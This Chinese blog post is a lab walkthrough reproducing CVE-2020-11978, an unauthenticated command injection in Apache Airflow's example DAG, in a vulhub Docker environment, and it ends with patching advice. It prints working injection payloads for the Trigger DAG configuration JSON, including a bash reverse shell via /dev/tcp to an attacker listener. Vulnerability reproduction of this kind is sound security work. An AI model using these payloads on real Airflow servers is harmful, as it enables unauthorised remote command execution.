前言

我自从学java工具开发以后，很少接触漏洞复现了，以前还是安服的时候每天都会复现一篇，后面转了方向就没怎么接触漏洞了。就在昨天，一个靓仔带着问题找我，问我会不会Apache Airflow(CVE-2020-11978)这个漏洞，所以，就有了这篇博文，CVE-2020-11978漏洞复现。

提示：以下是本篇文章正文内容，下面案例可供参考

1.漏洞信息补充

Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG（Directed acyclic graph 有向无环图）来管理任务流程的任务调度工具， 不需要知道业务数据的具体内容，设置任务的依赖关系即可实现任务调度。
这个平台拥有和 Hive、Presto、MySQL、HDFS、Postgres 等数据源之间交互的能力，并且提供了钩子（hook）使其拥有很好地扩展性。除了一个命令行界面，该工具还提供了一个基于 Web 的用户界面可以可视化管道的依赖关系、监控进度、触发任务等。

2. 漏洞简介

Apache Airflow是一款开源的，分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞，未授权的访问者可以通过这个漏洞在Worker中执行任意命令。

3.影响版本

Apache Airflow <= 1.10.10

4.漏洞复现

一、启动vulhub靶场环境

没有vulhub的就去下一个vulhub，按照步骤来解压安装包就行。如果vulhub版本比较老是没有这个漏洞的，下载一个新的vulhub就行，如下图所示的第二个airflow就是。

进入CVE-2020-11978文件夹

输入以下命令启动

docker-compose run airflow-init

docker-compose up -d

访问漏洞地址：http://127.0.0.1:8080 即可

由于在虚拟机里操作不方便，在虚拟机ifconfig命令获取到ip地址是192.168.25.130，用这个ip替换127.0.0.1即可在本地的浏览器访问，如下所示：

注意！由于漏洞环境比较大，启动的时间很慢，并不是一下子就能访问到的，具体等待多久我是不清楚的，我是前一天晚上启动了环境，发现无法访问8080端口，睡了一觉起来后，才能访问的，所以不要着急，环境启动完需要耐心等待，可以先去做别的事情。

二、命令执行

访问http://192.168.25.130:8080进入airflow管理端，将example_trigger_target_dag前面的Off改为On。

进入example_trigger_target_dag页面，点击Trigger DAG，进入到调试页面。

在Configuration JSON中输入：

{
    "message":"'\";touch /tmp/what_the_fuck;#"}

再点击Trigger执行dag。
等几秒可以看到执行成功。

显示success，说明成功。

进入容器查看目录，发现成功创建/tmp/what_the_fuck文件，漏洞复现成功。

docker-compose exec airflow-worker bash

三、NC反弹shell

上面既然能用touch创建文件了，那么反弹一个shell回来，问题也不大，接下来看操作。

攻击机192.168.230.234开启nc，监听9999端口。

在Configuration JSON中输入：

{
    "message":"'\";bash -i >& /dev/tcp/192.168.230.234/9999 0>&1;#"}

{“message”:“'”;;#"}，再点击Trigger执行dag。

成功反弹shell，可以命令执行了。

5. 修复建议

1、升级到1.10.10之后版本
2、删除或禁用默认DAG（可自行删除或在配置文件中禁用默认DAGload_examples=False）

总结

漏洞复现故而简单，但是其中的原理还是有点迷糊，建议大家在复现漏洞的同时，还要搞懂其中的原理。

    文章原创，欢迎转载，请注明文章出处： （CVE-2020-11978）Airflow dag中的命令注入漏洞复现【vulhub靶场】。百度和各类采集站皆不可信，搜索请谨慎鉴别。技术类文章一般都有时效性，本人习惯不定期对自己的博文进行修正和更新，因此请访问出处以查看本文的最新版本。